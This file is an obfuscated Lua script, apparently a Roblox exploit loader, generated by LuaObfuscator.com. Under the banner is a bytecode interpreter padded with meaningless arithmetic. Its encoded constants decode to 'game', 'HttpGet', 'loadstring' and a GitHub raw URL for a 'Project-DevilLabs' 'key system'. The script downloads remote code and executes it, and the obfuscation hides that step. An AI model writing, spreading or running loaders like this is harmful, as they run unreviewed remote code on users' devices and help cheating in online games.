--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v75=v2(v0(v20,16));if v19 then local v79=v5(v75,v19);v19=nil;return v79;else return v75;end end end);local function v21(v22,v23,v24)if v24 then local v76=0 -0 ;local v77;while true do if (v76==(0 -0)) then v77=(v22/((825 -((1520 -(749 + 505)) + (754 -(70 + 127))))^(v23-(1 -0))))%(2^(((v24-(3 -2)) -(v23-1)) + 1 + 0)) ;return v77-(v77%(894 -(223 + 670))) ;end end else local v78=(2 + 0)^(v23-1) ;return (((v22%(v78 + v78))>=v78) and 1) or (280 -(28 + 252)) ;end end local function v25()local v38=v1(v16,v18,v18);v18=v18 + 1 ;return v38;end local function v26()local v39=0 + 0 ;local v40;local v41;while true do if (v39==(1 + 0)) then return (v41 * (87 + 169)) + v40 ;end if (v39==(0 -0)) then v40,v41=v1(v16,v18,v18 + 2 );v18=v18 + (729 -(282 + 446)) + 1 ;v39=1 + 0 ;end end end local function v27()local v42,v43,v44,v45=v1(v16,v18,v18 + ((2251 -(151 + 630)) -(995 + 472)) );v18=v18 + 4 + 0 ;return (v45 * 16777216) + (v44 * (109847 -(45216 -(142 + 763)))) + (v43 * (687 -(381 + 50))) + v42 ;end local function v28()local v46=0;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v46==(1903 -((3835 -2225) + 291))) then v51=v21(v48,(1558 -841) -(551 + 145) ,154 -(55 + 42 + 26) );v52=((v21(v48,32)==(1600 -(1286 + 313))) and  -(1956 -(1865 + 90))) or (3 -2) ;v46=3;end if (v46==(0 -0)) then v47=v27();v48=v27();v46=1 + 0 ;end if (v46==((2 -1) -0)) then v49=1;v50=(v21(v48,1032 -(981 + (1266 -(687 + 529))) ,9 + 11 ) * (2^((63 + 60) -91))) + v47 ;v46=1 + 0 + 1 + 0 ;end if (v46==(1984 -(1564 + 417))) then if (v51==(0 + 0)) then if (v50==(0 + (0 -0))) then return v52 * (0 + 0) ;else v51=1 + 0 ;v49=0 -0 ;end elseif (v51==(1194 + 853)) then return ((v50==(114 -(81 + 33))) and (v52 * ((682 -(49 + 15 + 617))/0))) or (v52 * NaN) ;end return v8(v52,v51-(545 + 478) ) * (v49 + (v50/((1840 -(1219 + 619))^52))) ;end end end local function v29(v30)local v53;if  not v30 then v30=v27();if (v30==(733 -(288 + 445))) then return "";end end v53=v3(v16,v18,(v18 + v30) -(1 + 0) );v18=v18 + v30 ;local v54={};for v67=1711 -(689 + 1021) , #v53 do v54[v67]=v2(v1(v3(v53,v67,v67)));end return v6(v54);end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v55=0 + 0 ;local v56;local v57;local v58;local v59;local v60;local v61;local v62;local v63;while true do if ((1817 -(699 + 1115))==v55) then v62=nil;v63=nil;v55=1225 -(761 + 460) ;end if (v55==(3 + 1)) then while true do if (v56==(1364 -(559 + 805))) then local v90=740 -(427 + 313) ;while true do if (v90==(1 + 0)) then v56=158 -(24 + 133) ;break;end if (v90==0) then v57=0 + 0 ;v58=nil;v90=3 -2 ;end end end if ((1 + 2)~=v56) then else v63=nil;while true do local v97=1961 -(1716 + 245) ;while true do if (v97==(0 + 0)) then local v102=0 + 0 ;local v103;while true do if (v102~=(791 -(147 + 644))) then else v103=0 + 0 ;while true do if (v103==(1 -0)) then v97=475 -(385 + 89) ;break;end if (v103~=0) then else if (v57==(1377 -(705 + 670))) then local v109=0 -0 ;local v110;while true do if (v109==0) then v110=0 + 0 ;while true do if (v110~=1) then else local v138=61 -(41 + 20) ;while true do if (v138==(0 + 0)) then for v154=1 + 0 ,v27() do v60[v154]=v27();end return v61;end end end if (v110==(0 + 0)) then local v139=0;local v140;while true do if (v139~=(366 -(95 + 271))) then else v140=0 -0 ;while true do if (v140==(1 + 0)) then v110=1 + 0 ;break;end if (v140~=(539 -(22 + 517))) then else for v162=1 + 0 ,v27() do local v163=0 + 0 ;local v164;while true do if (v163==0) then v164=v25();if (v21(v164,1,1 + 0 )~=(0 -0)) then else local v169=868 -(426 + 442) ;local v170;local v171;local v172;local v173;while true do if (v169==(1212 -(550 + 660))) then while true do if (v170==(7 -4)) then if (v21(v172,1501 -(164 + 1334) ,3)==(1074 -(220 + 853))) then v173[4]=v63[v173[4]];end v58[v162]=v173;break;end if (v170==(168 -(106 + 61))) then local v176=0 + 0 ;while true do if (v176~=(3 -2)) then else v170=168 -(53 + 113) ;break;end if ((780 -(401 + 379))==v176) then local v185=0 + 0 ;while true do if (v185==(280 -(250 + 30))) then v173={v26(),v26(),nil,nil};if (v171==(0 + 0)) then local v187=0 + 0 ;local v188;local v189;local v190;while true do if (v187~=(0 -0)) then else v188=0 -0 ;v189=nil;v187=1 + 0 ;end if (v187==1) then v190=nil;while true do if (v188==(1 + 0)) then while true do if ((0 -0)~=v189) then else v190=1856 -(1119 + 737) ;while true do if (v190~=0) then else v173[4 -1 ]=v26();v173[4]=v26();break;end end break;end end break;end if ((0 -0)~=v188) then else local v193=0;while true do if (1==v193) then v188=1 + 0 ;break;end if (v193==(0 + 0)) then v189=0 + 0 ;v190=nil;v193=1 -0 ;end end end end break;end end elseif (v171==(1 + 0)) then v173[12 -9 ]=v27();elseif (v171==(1202 -(235 + 965))) then v173[1541 -(573 + 965) ]=v27() -((2 + 0)^(31 -15)) ;elseif (v171==(1 + 2)) then local v194=0 + 0 ;local v195;while true do if ((0 -0)==v194) then v195=0 + 0 ;while true do if (v195==0) then v173[6 -3 ]=v27() -(2^(1278 -(478 + 784))) ;v173[4]=v26();break;end end break;end end end v185=1;end if (v185==1) then v176=1 -0 ;break;end end end end end if (v170~=(0 + 0)) then else local v177=0 -0 ;local v178;while true do if (v177~=0) then else v178=0 + 0 ;while true do if (v178~=(0 -0)) then else local v186=0 + 0 ;while true do if (v186==(0 -0)) then v171=v21(v164,2 -0 ,3);v172=v21(v164,1548 -(1094 + 450) ,19 -13 );v186=1 + 0 ;end if (v186~=1) then else v178=1;break;end end end if (v178==(1 + 0)) then v170=1 + 0 ;break;end end break;end end end if (v170==(4 -2)) then if (v21(v172,1,1 + 0 )==1) then v173[2 + 0 ]=v63[v173[1546 -(1543 + 1) ]];end if (v21(v172,2,930 -(546 + 382) )==(3 -2)) then v173[587 -(278 + 306) ]=v63[v173[3]];end v170=2 + 1 ;end end break;end if (v169~=(0 -0)) then else v170=0 + 0 ;v171=nil;v169=1;end if (v169==(1 + 0)) then v172=nil;v173=nil;v169=7 -5 ;end end end break;end end end for v165=3 -2 ,v27() do v59[v165-1 ]=v33();end v140=1 + 0 ;end end break;end end end end break;end end end if (v57==(0 + 0)) then local v111=0 + 0 ;local v112;while true do if ((0 -0)==v111) then v112=0 + 0 ;while true do if (v112~=(0 + 0)) then else local v141=0 + 0 ;while true do if (v141==(1 + 0)) then v112=1715 -(1353 + 361) ;break;end if (v141~=(1715 -(1405 + 310))) then else v58={};v59={};v141=4 -3 ;end end end if (v112~=(1299 -(1192 + 105))) then else v57=2 -1 ;break;end if ((178 -(36 + 141))~=v112) then else local v142=0;local v143;while true do if (v142==(0 + 0)) then v143=0 + 0 ;while true do if ((1642 -(761 + 880))==v143) then v112=4 -2 ;break;end if (0~=v143) then else v60={};v61={v58,v59,nil,v60};v143=1 + 0 ;end end break;end end end end break;end end end v103=4 -3 ;end end break;end end end if (v97==(2 -1)) then if ((1 + 0)==v57) then local v104=900 -(424 + 476) ;local v105;local v106;while true do if (v104~=(1213 -(55 + 1157))) then else while true do if (v105==(270 -(71 + 199))) then v106=666 -(67 + 599) ;while true do if (v106==(50 -(34 + 15))) then local v130=330 -(151 + 179) ;local v131;while true do if ((0 + 0)~=v130) then else v131=0 -0 ;while true do if (v131==0) then for v156=1,v62 do local v157=0 + 0 ;local v158;local v159;local v160;local v161;while true do if (v157==2) then while true do if ((1541 -(775 + 766))==v158) then v159=0 + 0 ;v160=nil;v158=1 + 0 ;end if (v158~=1) then else v161=nil;while true do if (v159==1) then if (v160==1) then v161=v25()~=(0 -0) ;elseif (v160==2) then v161=v28();elseif (v160==3) then v161=v29();end v63[v156]=v161;break;end if (v159~=(0 + 0)) then else v160=v25();v161=nil;v159=1 + 0 ;end end break;end end break;end if (v157==(745 -(717 + 28))) then v158=0 + 0 ;v159=nil;v157=1 + 0 ;end if (v157==(1 -0)) then v160=nil;v161=nil;v157=1 + 1 ;end end end v61[3]=v25();v131=1 -0 ;end if (v131==1) then v106=6 -4 ;break;end end break;end end end if (v106~=(2 + 0)) then else v57=800 -(73 + 725) ;break;end if (v106==0) then v62=v27();v63={};v106=1;end end break;end end break;end if (v104~=(0 + 0)) then else v105=0 -0 ;v106=nil;v104=1 -0 ;end end end break;end end end break;end if (v56==(2 -1)) then local v91=0;while true do if ((1 + 0)==v91) then v56=9 -7 ;break;end if (v91==(1976 -(1933 + 43))) then v59=nil;v60=nil;v91=1;end end end if (v56~=2) then else v61=nil;v62=nil;v56=3;end end break;end if (v55==(185 -(106 + 79))) then v56=1932 -(777 + 1155) ;v57=nil;v55=1 + 0 ;end if (1==v55) then v58=nil;v59=nil;v55=5 -3 ;end if (2==v55) then v60=nil;v61=nil;v55=7 -4 ;end end end local function v34(v35,v36,v37)local v64=v35[1];local v65=v35[2];local v66=v35[3];return function(...)local v69=0;local v70;local v71;local v72;local v73;local v74;while true do if (3==v69) then A,B=v32(v11(v74));if  not A[1] then local v92=0;local v93;while true do if (0==v92) then v93=v35[4][v70] or "?" ;error("Script error at ["   .. v93   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end break;end if (v69==1) then v72={...};v73=v12("#",...) -1 ;v69=2;end if (v69==2) then v74=nil;v74=function()local v80=v64;local v81=v65;local v82=v66;local v83=v32;local v84={};local v85={};local v86={};for v94=1222 -(158 + 1064) ,v73 do if ((v94>=v82) or ((127 + 121)>=(1188 + (7926 -5638)))) then v84[v94-v82 ]=v72[v94 + (342 -(326 + 7 + 8)) ];else v86[v94]=v72[v94 + (1270 -(68 + 1201)) ];end end local v87=(v73-v82) + (2 -(1 + 0)) ;local v88;local v89;while true do local v95=1466 -(980 + 486) ;local v96;while true do if (((1293 -(278 + 497))<=(2398 + 1023)) and ((864 -(610 + 254))==v95)) then v96=(0 + 0) -0 ;while true do if (((4715 -(947 + 295))>(20 + 2625)) and (v96==(1 + 0))) then if ((v89<=(640 -(410 + (553 -326)))) or ((4694 -(149 + 1576))>=(4320 -(120 + 645)))) then if ((v89<=(1314 -((1554 -473) + 232))) or ((4391 -(1733 + (319 -213)))>(4545 -(1292 + (269 -(149 + 19)))))) then if (((750 + 3120)==(4618 -(357 + 391))) and (v89==(0 + 0))) then local v113=456 -(27 + 429) ;local v114;local v115;while true do if ((v113==1) or ((4353 -2885)>(1788 + 1657))) then while true do if ((v114==((0 + 0) -0)) or ((687 -543)>=(438 + 1623 + 886))) then v115=v88[7 -5 ];v86[v115]=v86[v115](v13(v86,v115 + 1 + 0 ,v71));break;end end break;end if (((470 + 165)<=(2257 + 2663)) and ((0 -0)==v113)) then local v132=0 + 0 + 0 ;while true do if (((257 + 102 + 4502)>=(5336 -1601)) and (v132==(0 -0))) then v114=0 -0 ;v115=nil;v132=3 -(7 -5) ;end if ((v132==(1 + 0 + 0)) or (((66 -35) + 12)>(3318 -(617 + 262)))) then v113=1937 -(1835 + 101) ;break;end end end end else local v116=0;local v117;local v118;local v119;local v120;local v121;while true do if (((320 + 138 + 512)<(102 + 4827)) and (v116==(1667 -(418 + 1247)))) then v121=nil;while true do if (((58 + 72)==(629 -499)) and (v117==(1198 -(186 + 1010)))) then for v148=v118,v71 do local v149=0 -0 ;local v150;local v151;while true do if (((174 + 3753)==(2344 + 1583)) and ((0 + 0)==v149)) then v150=0 + 0 ;v151=nil;v149=1 + 0 ;end if (((5765 -(925 + (410 -296)))>((8497 -(379 + 160)) -3595)) and (v149==(1 -0))) then while true do if (((493 -353)<=(4660 -(226 + 620))) and (v150==(1545 -(578 + 967)))) then v151=0;while true do if (((685 -(305 + 3))<=(684 -256)) and ((205 -(146 + 59))==v151)) then v121=v121 + (2 -1) ;v86[v148]=v119[v121];break;end end break;end end break;end end end break;end if (((13216 -9044)<=(6248 -(1132 + 221))) and (v117==((622 -(312 + 308)) -1))) then local v146=0 + 0 ;while true do if ((v146==0) or ((2369 + 1013)==(70 + 15 + 3))) then v71=(v120 + v118) -(1 -0) ;v121=0 + 0 ;v146=1 + 0 ;end if ((v146==((995 -(986 + 8)) + 0)) or ((165 + 3561)>=3936)) then v117=(2 -0) -0 ;break;end end end if (((1311 -(736 + 207))>((2842 -(215 + 1439)) -(563 + 403))) and (v117==(1892 -(376 + 1516)))) then local v147=0;while true do if ((((3563 + 1958) -(613 + 1171))>=(2023 -(495 + 652))) and (v147==(1 -0))) then v117=75 -(32 + 42) ;break;end if (((690 -(154 + 380))<(98 + 238 + 234 + 429)) and (v147==(0 + 0))) then v118=v88[2 + 0 ];v119,v120=v83(v86[v118](v13(v86,v118 + 1 ,v88[3 + 0 ])));v147=1 + 0 ;end end end end break;end if (((10520 -(2316 + 5460))==((441 + 3283) -((1244 -641) + 377))) and (v116==(1 + 0))) then v119=nil;v120=nil;v116=797 -(162 + 633) ;end if ((v116==(0 -0)) or ((2328 -(682 + 234))<(2316 -955))) then v117=0 -0 ;v118=nil;v116=807 -(227 + 579) ;end end end elseif ((v89>(1236 -(835 + 399))) or ((3981 -3172)>=850)) then v86[v88[8 -6 ]]();else do return;end end elseif (((7299 -3295)<=(4830 + 71)) and (v89<=((1195 -(809 + 367)) -14))) then if (((5621 -3345)>((763 -349) + (1199 -(290 + 283)))) and (v89>(4 + 0))) then v86[v88[1 + 1 ]]=v88[5 -2 ];else v86[v88[4 -2 ]]=v37[v88[(1201 -(699 + 494)) -5 ]];end elseif (((1172 + (2988 -(1234 + 88)))<(11472 -(15058 -7309))) and (v89>(1 + 1 + 4))) then v86[v88[881 -(311 + 568) ]]=v88[904 -(255 + 646) ]~=(219 -(67 + 152)) ;else local v127=(0 + 0) -0 ;local v128;local v129;while true do if (((1915 -(120 + 222))<=(8525 -4337)) and (v127==(0 + 0))) then v128=v88[2 + 0 ];v129=v86[v88[10 -7 ]];v127=1326 -(1149 + 176) ;end if ((v127==(1 + 0)) or ((1241 -(627 + 408))>(3698 -((3367 -1696) + 4)))) then v86[v128 + (1 -0) ]=v129;v86[v128]=v129[v88[17 -13 ]];break;end end end v70=v70 + 1 ;break;end if (((982 + 428)==(3617 -(5543 -3336))) and (v96==(0 -0))) then v88=v80[v70];v89=v88[1 + 0 ];v96=1 + 0 ;end end break;end end end end;v69=3;end if (v69==0) then v70=1;v71= -1;v69=1;end end end;end return v34(v33(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403543O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4461726B6573746C6567656E64732F50726F6A6563742D446576696C4C6162732F6D61696E2F6B657925323073797374656D00093O0012043O00013O001204000100023O002006000100010003001205000300044O0007000400014O0001000100049O0000022O00033O000100012O00023O00017O00093O00023O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
